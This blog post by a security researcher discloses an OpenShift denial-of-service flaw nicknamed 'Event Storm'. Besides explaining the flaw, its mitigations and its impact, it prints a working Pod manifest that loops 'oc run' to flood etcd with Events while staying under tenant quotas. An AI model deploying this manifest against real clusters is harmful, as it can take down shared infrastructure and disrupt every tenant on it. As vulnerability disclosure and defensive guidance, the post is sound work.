Monday, June 22, 2026

Finding CVE-2026-10533 "Event Storm": When Security Guards Watch the Wrong Door

Throughout my career, I've always gravitated toward two things: technology infrastructure, and cybersecurity. Being awarded with CVE-2026-10533 was a pleasure and a privilege, as I got to contribute to the security community not through the normal red-team lenses of memory corruption, obfuscated payloads, or social engineering. Instead, this CVE was discovered by asking a much simpler question:

What happens when a tenant consumes a shared cluster resource that nobody is measuring?

Let's break this question down a bit, to understand the exploit methodology. If you're already an expert in OpenShift administration, feel free to skip the next section.

Defining the Question

In this case, what is a tenant? If you're unfamiliar with OpenShift, Kubernetes, or cloud computing in general - a tenant is simply one "user" of the (usually shared) distributed system. Therefore, when you use the cloud (e.g., you stand up an application inside AWS, GCP, etc.), you are a single tenant of the cloud. Almost always - except where you pay a premium for an exception! - you *share* the underlying compute and resources of the cloud with other users that you simply don't have access to see or interact with. You could have two people from two completely different countries and companies provision some software on the cloud and the cloud provider chooses to place their workloads right next to each other on the same physical server in the same physical datacenter for a plethora of different reasons. The biggest point to take from this is that by design, tenants are isolated from one another.

So what do we mean by shared? While tenants are supposed to be completely isolated from one another, they could end up using shared resources, like the physical server mentioned above. If that one server fails, BOTH tenants are impacted. Maintaining shared cluster and cloud resources with priority and fairness to all tenants is pretty much the entire job description of cloud administrators and operators. There is a lot to manage as you can probably imagine, but think of it akin to maintaining the roads that many people drive on, the sewage systems that many houses use, the electricity grid tied to many endpoints, etc. If a cluster admin inadvertently impacts a shared resource, that is a bad day at work for that guy. If a *tenant* can intentionally impact shared resources, and step on other tenants, that is when the activity crosses the line from accidental incident to malicious attack.

Why do I say nobody? Well, cluster admins can and should be watching their shared cluster resources that all tenants use. However, there are many things that tenants technically "share", including but not limited to:

  • Underlying host CPU
  • Underlying host memory
  • Underlying host disk space
  • Underlying host network
  • Network bandwidth
  • Cluster control plane API calls
  • DNS nameservers
  • L3 network
  • L1 data cables
  • Server rack PDUs
  • Datacenter aisle
  • Datacenter HVAC
  • Datacenter electricity allocation
  • Regional power grid
and much more. Of course, multiply that by however many nodes or however many clusters an administrator has to watch, and it quickly becomes cumbersome, not to mention transcends multiple teams and departments within an organization. To handle all of this, many cloud administrators instead rely on automated monitoring and alerting. In this question that I posit, I'm looking for something that flies under the radar of accounting systems.

Lastly, what do I mean by measuring? All the shared resources I listed above have different thresholds for good and bad states. If I say that a single physical server is utilizing 20% of it's CPU capacity, that has different implications than if I say a single physical server is utilizing 20% of the regional power grid! All systems, and all resources in that system, require different measurements and different alerting thresholds. Again, I want something that nothing is measuring or could trip.

I'm looking for a door with no security guards watching it.

Enter Events

I have personally dubbed CVE-2026-10533 as "Event Storm". What do I mean by "Events"? Well Events in Kubernetes are simply metadata objects that get created and logged whenever something interesting happens in a cluster, such as:
  • A Pod is created
  • A container image is pulled
  • A container starts
  • A scheduling decision occurs
  • A readiness probe fails
  • A Pod completes successfully
All of these actions generate an Event object that logs the timestamp, description of what happened, and references to the tenant and workload that generated the Event. Events are extremely useful for troubleshooting because they provide a timeline of what happened inside the cluster. 

The downside is that Events are not free.

Each Event is stored in etcd, the distributed key-value database of Kubernetes that serves as the cluster's source of truth. etcd is arguably the most critical component in the cluster. It stores information about Pods, Deployments, Nodes, Services, Operators, Images, API objects, and countless other pieces of cluster state. If etcd becomes unhealthy, the rest of the cluster quickly follows. A Kubernetes cluster is ultimately a distributed system whose state is coordinated through etcd. Anything capable of overwhelming etcd therefore has the potential to impact the entire cluster.

Normal Guardrails

There are ways to limit the overuse of shared resources in Kubernetes and keep a single tenant from getting too greedy, specifically through a concept known as ResourceQuotas. Most enterprise Kubernetes and OpenShift use ResourceQuotas to prevent a single tenant from consuming excessive resources. A typical tenant's provisioning space (called a Namespace) might be limited to:
  • 10 Pods
  • 1 CPU
  • 10 GiB of memory
The assumption is straightforward: if a tenant can only run a small number of Pods with limited CPU and memory, they should not be able to negatively impact the cluster as a whole. This assumption is generally correct when the resource being consumed is CPU, memory, or storage. The problem is that ResourceQuotas are only capable of measuring the resources they are configured to measure. 

Events are not one of these resources.

So, is there a way to take advantage of the fact that nobody is measuring Events as a shared cluster resource, from a single tenant? Glad you asked, because that is what CVE-2026-10533 is all about.

Enter the Exploit



The beautiful thing about this particular exploit is that no cluster admin permissions are required. No elevated permissions are required. No cross-namespace access is required. No quota modifications are required.

The only permission required is the ability to *deploy* a single Pod. In fact, you do not even need the ability to run that Pod! Why does that distinction matter? Well maybe your interns on your Software Development team have the ability to run deployment pipelines because it is all taken care of by the enterprise deployment automation. Perhaps the runtime access is locked down to your sysadmins, or even non-human ServiceAccounts. But the simple, repeatable, no-login deployment pipeline trigger is just a click away. 

I hear you: "enough already, give me the exploit". Fine.

The exploit works thusly: by using a default ServiceAccount that comes standard with every new OpenShift project/namespace (account name: "deployer") to create short-lived Pods within allowed CPU/memory ResourceQuotas, it is possible to generate ~130,000 Events in under three hours from a single namespace - enough to severely degrade API server performance on new OpenShift clusters, and completely topple clusters older than a couple of in-place major version upgrades.

We simply create a malicious DoS control Pod that continuously spawns new extremely short-lived Pods. This continuous spawning of new Pods and their subsequent completion generates many Events and API server requests. 

Even with a typical ResourceQuota found in enterprises of:
pods: 0/10 requests.cpu: 0/1 requests.memory: 0/10Gi
this exploit bypasses that in the following ways:

  • Number of Pods: Each child Pod sleeps for a very short duration (< 150ms) on start. Additionally, with the restartPolicy: Never flag set, the Pod gets "forgotten" about by the API server. "Completed" Pods do not count toward the overall project Pod count, unless a very specific configuration setting is enabled (but most organizations would not want this enabled anyway as it would block new CronJob Pods from starting).
  • CPU request: each child Pod requests 100m of CPU, and is forgotten about upon Completion.
  • Memory request: each child Pod requests 128Mi of memory, and is forgotten about upon Completion.

Exploit Code

The following Bash/YAML code demonstrates the malicious DoS control Pod with the highest clarity, but would be much slower than the same exploit in Go. The Go-based exploit can be found on my GitHub. The below simply highlights the exploit methodology:

apiVersion: v1
kind: Pod
metadata:
  name: dos-control-pod
spec:
  restartPolicy: Never
  serviceAccountName: deployer # this allows the Pod to create Pods
  containers:
    - name: dos
      image: openshift4:4.16.36-x86_64-cli # an OC CLI image, or put the OC CLI binary into any other image
      command:
        - /bin/sh
        - -c
        - |
          while true; do
            oc run --wait=false \ # Do not wait for a response from the API server
            new-$(date +%s%N) \ # use nanosecond timestamp for Pod name uniqueness
            --restart=Never \ # Force the Pod to complete and the API server to forget about it
            --image=any-image \ # can be any image, just need to sleep
            --overrides='{"spec":{"containers":[{"name":"dos","image":"any-image","resources":{"requests":{"cpu":"100m","memory":"128Mi"},"limits":{"cpu":"100m","memory":"128Mi"}}}]}}'
            done
      resources:
        limits:
          cpu: 100m
          memory: 300Mi
        requests:
          cpu: 100m
          memory: 300Mi

Exploit Impact

One Go-based DoS control Pod in one Namespace generates about 43,000 Events/hour with all associated guardrails in place. Since Event TTL is 3 hours, this exploit generates ~130,000 Events from one Namespace before the cluster starts to clean it up. I have personal experience at a large enterprise dealing with older OpenShift clusters that have degraded and lost full availability around ~150,000-200,000 Event objects from ALL tenant Namespaces, meaning this exploit can easily account for ~86% of a cluster's total Event capacity.

The 43,000 Events/hour count is from a quick proof-of-concept. Dedicated time, research, and effort to create a highly-targeted and crafted exploit (say one that works around the API server's priority and fairness queue, or some low-level kernel-calling of the on-Node container creation engine, whatever) could raise this count significantly.

Also note, if an attacker can push multiple control Pods to multiple namespaces, the attack vector multiplies in impact.

Consideration for Long-Running/Aged Clusters

CVE-2026-10533 received a CVSS score of 5.0 Moderate, which isn't enough to make nation-state adversaries get out of bed to start exploiting. The reason for this is because Red Hat in their own testing used fresh, small clusters to test the exploit against. While they confirmed it does degrade API server performance, they never saw a full cluster failure.

However, real-world OpenShift clusters are much different. I've seen clusters as old as 6 years that received in-place cluster version upgrades the entire time. I've seen clusters of 200+ Nodes, with 50,000 Pods on them. I've seen clusters with 40+ operators (the software kind, not human kind), all tracking and managing state of various components independently, and relying on etcd for any kind of information. 

Now imagine you have a four year old cluster of 100+ Nodes, 20,000 Pods, maybe 25 operators, and 600 different Namespaces/tenants. That is a lot of objects. Old MachineConfigs and certs from cluster versions long past may still be lingering around. User and Group objects to handle all the developer logins, RBAC configs flying around, Node states switching from Healthy to NodeDiskPressure and back again, images being pulled, Pods completing runs, the list goes on. etcd is tracking all of this, and it only gets more bogged down the more you add to the cluster. 

While you can have a healthy cluster with all of the above objects being stored and tracked and modified (trust me, that is a full time job in and of itself), imagine if I cut your etcd capacity by 86% through exploiting CVE-2026-10533. Your cluster will crash.

Now I'm not telling would-be attackers out there to potentially try to exploit Event Storm on clusters they find have been around for a while, all I'm saying is don't automatically scoff at the Moderate score it received.

Weathering the Storm

A few mitigations exist for CVE-2026-10533, but they come with trade-offs.
  1. Turn off "DeploymentConfig" capability at cluster build time. This will NOT create the default "deployer" ServiceAccount and would require an attacker to need the ability to both deploy a Pod, and run a Pod that can deploy Pods (needs to run a DoS control Pod). The deployer account takes care of creating Pods for us, but if that went away the attacker would need more permissions. However, this additional privilege may not be too difficult to acquire if they already have an account that can deploy a Pod. Simply run the Pod as their initial deploying account and it may work immediately.
  2. Setting ResourceQuota/v1/spec.scopes to NotTerminating and applying to all namespaces in a cluster would prevent this exploit, and allow ResourceQuotas to track Completed Pods. There is a very large tradeoff with this however, in that a normal CronJob object spawns "Job" Pods, and they of course do their job then Complete. If you only allow 10 Completed Pods per namespace, a tenant could only run 10 Jobs before having to clean up (or else the next Job would fail). This more than likely is not something a Platform Engineering team would want to enable, as it would impose a lot of restrictions on developers and users of OpenShift.

Acknowledgements

All in all, this has been a fun process of finding a CVE. I am grateful to my peers and management at my old role at Citibank, N.A. who gave me the opportunity to do some threat modeling of our OpenShift clusters. I am grateful to Red Hat for awarding the CVE, and to my friends and family for all the support over this long disclosure process.



No comments:

Post a Comment

Finding CVE-2026-10533 "Event Storm": When Security Guards Watch the Wrong Door

Throughout my career, I've always gravitated toward two things: technology infrastructure, and cybersecurity. Being awarded with CVE-202...